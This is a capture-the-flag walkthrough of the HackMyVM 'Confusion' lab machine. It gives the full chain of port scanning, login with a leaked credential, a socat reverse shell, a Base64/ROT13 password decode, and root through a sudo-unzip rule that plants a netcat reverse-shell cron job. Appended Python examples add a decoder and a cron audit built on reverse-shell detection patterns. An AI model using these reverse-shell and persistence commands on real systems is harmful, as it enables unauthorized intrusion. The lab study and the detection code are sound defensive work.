HackMyVM - Confusion - Walkthrough



So Confusion is the perfect name for this machine: more rabbit holes than Watership Down...

https://hackmyvm.eu/machines/machine.php?vm=Confusion

Running VirtualBox with Kali [10.0.0.11]

I gave up trying to make this look pretty, and I did not include the hashes or actual passwords.


Identify the target

┌──(kali㉿kali)-[~/confusion]
└─$ nmap -sn  10.0.0.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 02:59 EDT
Nmap scan report for 10.0.0.11
Host is up (0.0014s latency).
Nmap scan report for 10.0.0.12
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.91 seconds


Scan for ports

└─$ sudo nmap -sC -sV -O -p-  10.0.0.12
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-29 03:19 EDT
Nmap scan report for 10.0.0.12
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 04:32:4e:fc:d9:70:a0:8a:47:4d:f5:a6:86:aa:bd:5f (RSA)
|   256 70:c2:bd:7d:b9:25:6d:36:92:fd:2a:8e:64:24:bd:73 (ECDSA)
|_  256 84:28:9c:40:fe:c4:26:bf:55:61:4c:58:c5:23:77:35 (ED25519)
32145/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     Welcome To The My Magic World
|     many times you want to ping?: Traceback (most recent call last):
|     File "/opt/ping.py", line 7, in <module>
|     no_of_packets = int(input("How many times you want to ping?: "))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   GetRequest: 
|     Welcome To The My Magic World
|     many times you want to ping?: Traceback (most recent call last):
|     File "/opt/ping.py", line 7, in <module>
|     no_of_packets = int(input("How many times you want to ping?: "))
|     File "<string>", line 1, in <module>
|     NameError: name 'GET' is not defined
|   HTTPOptions, RTSPRequest: 
|     Welcome To The My Magic World
|     many times you want to ping?: Traceback (most recent call last):
|     File "/opt/ping.py", line 7, in <module>
|     no_of_packets = int(input("How many times you want to ping?: "))
|     File "<string>", line 1, in <module>
|     NameError: name 'OPTIONS' is not defined
|   NULL: 
|     Welcome To The My Magic World
|_    many times you want to ping?:
1 service unrecognized despite returning data. If you know the service/version,

Port 22: SSH
Port 32145: looks like a Python script running from /opt/ping.py

After much poking at 32145 and lots of research into running Python as a service and exploits for it, I gave up on that and tried SSH…


└─$ ssh 10.0.0.12                 
Have you ever thought?
     If 
 Cindrella's 
   Shoe Fit 
  Perfectly 
   Then Why 
  Did It Fall 
    Off?
still:confused?
Then go for Port 32145 :)
kali@10.0.0.12's password:

Could “still:confused?” be a “username:password” combination?

still@10.0.0.12's password: 
Linux confusion 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 29 00:47:28 2021 from 10.0.0.11
Welcome To My Secret Most Secure Shell :p
vi /etc/passwd
Vim: Warning: Output is not to a terminal

There seem to be some restricted commands, and it doesn’t display standard output, so let's try something different (remember the rabbit hole of Python services…).

Set up a listener on the attack box:
nc -v -n -l -p 4444 

Try to connect to it from the victim:

Welcome To My Secret Most Secure Shell :p
socat TCP4:10.0.0.11:4444 exec:/bin/bash

└─$ nc -v -n -l -p 4444
listening on [any] 4444 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.12] 56110
pwd
/home/still
ls -l
total 8
-r-------- 1 sammy sammy  24 Oct 25 14:47 password.txt
-r-x--x--x 1 still still 521 Oct 25 13:49 SoMuchConfusion
sudo -l
Matching Defaults entries for still on confusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User still may run the following commands on confusion:
    (sammy) NOPASSWD: /usr/bin/python3 /opt/password.py
sudo -u sammy /usr/bin/python3 /opt/password.py
QWJCYXJQbmFQZW5weFpsQ2*************


So we have a new user, “sammy” (allowed to run a special command), and something with the potential to be a password.
(doesn't work)
https://www.dcode.fr/cipher-identifier suggests it's Base64.
Base64 decoded returns: AbBarPnaPenpx********
(doesn’t work)
https://www.dcode.fr/cipher-identifier suggests ROT13:
NoOneCanJust*************
Success!
We have the user.txt.
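The two-layer decode above (Base64, then ROT13), as an added example that is not part of the original walkthrough. The real string from /opt/password.py is redacted on the page, so the input here is a constructed stand-in built the same way, and the function records each layer so a bad or binary input is visible as a short chain instead of a garbled "password".

```python
import base64
import binascii
import codecs
import string

# Constructed stand-in for the output of /opt/password.py (the page redacts the
# real string): a phrase ROT13'd and then base64-encoded, as the walkthrough found.
SAMPLE = base64.b64encode(codecs.encode("SamplePhraseOnly", "rot13").encode()).decode()

def looks_readable(text):
    """True when every character is printable ASCII, i.e. a plausible decode."""
    return bool(text) and all(c in string.printable for c in text)

def peel(blob):
    """Apply the page's two layers in order (base64, then ROT13) and return the
    list of (layer, value) stages. A layer that fails validation stops the chain,
    so a short list means the input was not what the chain expects."""
    stages = [("raw", blob)]
    try:
        decoded = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return stages                      # not base64, or binary underneath
    if not looks_readable(decoded):
        return stages
    stages.append(("base64", decoded))
    stages.append(("rot13", codecs.decode(decoded, "rot13")))
    return stages

if __name__ == "__main__":
    for layer, value in peel(SAMPLE):
        print(f"{layer:>7}: {value}")
```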


Escalate to root


sammy@confusion:~$ sudo -l
Matching Defaults entries for sammy on confusion:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sammy may run the following commands on confusion:
    (root) NOPASSWD: /usr/bin/unzip

Create a new file, expcron, containing:

*/5 *     * * *     root   /usr/bin/nc -c /bin/bash\ -i 10.0.0.11 1234 0>&1


zip cron.zip expcron
Then, using the sudo access, unzip it into /etc/cron.d, set up a listener and wait a few minutes!
sudo /usr/bin/unzip cron.zip -d /etc/cron.d
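From the defender's side, the weakness exploited here is that a sudo rule for unzip lets a user drop arbitrary files into /etc/cron.d, which cron then runs as root. The audit below is an added example, not code from the walkthrough: it parses system-crontab lines and scores the command for reverse-shell traits (netcat/socat, /dev/tcp, interactive shell, descriptor redirection), weighting a lone `2>&1` low so routine jobs are not flagged. The directory contents are a constructed sample; the "expcron" line mirrors the one planted above.

```python
import re

# Constructed sample of /etc/cron.d contents, keyed by file name. The "expcron"
# line mirrors the walkthrough's entry; the others are benign lookalikes.
SAMPLE_CRON_D = {
    "logrotate": "SHELL=/bin/sh\n0 * * * *  root  /usr/sbin/logrotate /etc/logrotate.conf 2>&1\n",
    "expcron": "*/5 *     * * *     root   /usr/bin/nc -c /bin/bash\\ -i 10.0.0.11 1234 0>&1\n",
    "backup": "@daily  backup  /usr/local/bin/backup.sh >/dev/null 2>&1\n",
}

# (regex, reason, weight): strong indicators score 2, a lone redirect only 1,
# so an ordinary "2>&1" does not reach the threshold by itself.
INDICATORS = [
    (r"(^|\s|/)(nc|ncat|netcat|socat)\b", "network tool run from cron", 2),
    (r"/dev/(tcp|udp)/", "bash network redirection", 2),
    (r"(^|\s|/)(ba)?sh\\?\s+-i\b", "interactive shell", 2),
    (r"\d?>&\s*\d", "descriptor redirection", 1),
]

# System crontab format: five schedule fields (or an @keyword), user, command.
CRON_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def audit_cron_d(files, threshold=2):
    """Return (file, user, score, reasons, command) for each entry at or above threshold."""
    findings = []
    for name, content in files.items():
        for line in content.splitlines():
            if not line.strip() or line.lstrip().startswith("#") or "=" in line.split()[0]:
                continue                    # blank, comment or VAR=value line
            m = CRON_LINE.match(line)
            if not m:
                continue
            cmd = m.group("cmd")
            hits = [(why, w) for rx, why, w in INDICATORS if re.search(rx, cmd)]
            score = sum(w for _, w in hits)
            if score >= threshold:
                findings.append((name, m.group("user"), score, [h for h, _ in hits], cmd))
    return findings

if __name__ == "__main__":
    for f in audit_cron_d(SAMPLE_CRON_D):
        print(f"{f[0]}: user={f[1]} score={f[2]} {f[3]}\n    {f[4]}")
```

To run it against a live host, replace SAMPLE_CRON_D with a dict read from the files in /etc/cron.d; the scoring is unchanged.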


nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [10.0.0.11] from (UNKNOWN) [10.0.0.12] 57438
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
cat root.txt             
cb9***************************


References:

https://www.dcode.fr/cipher-identifier
https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/
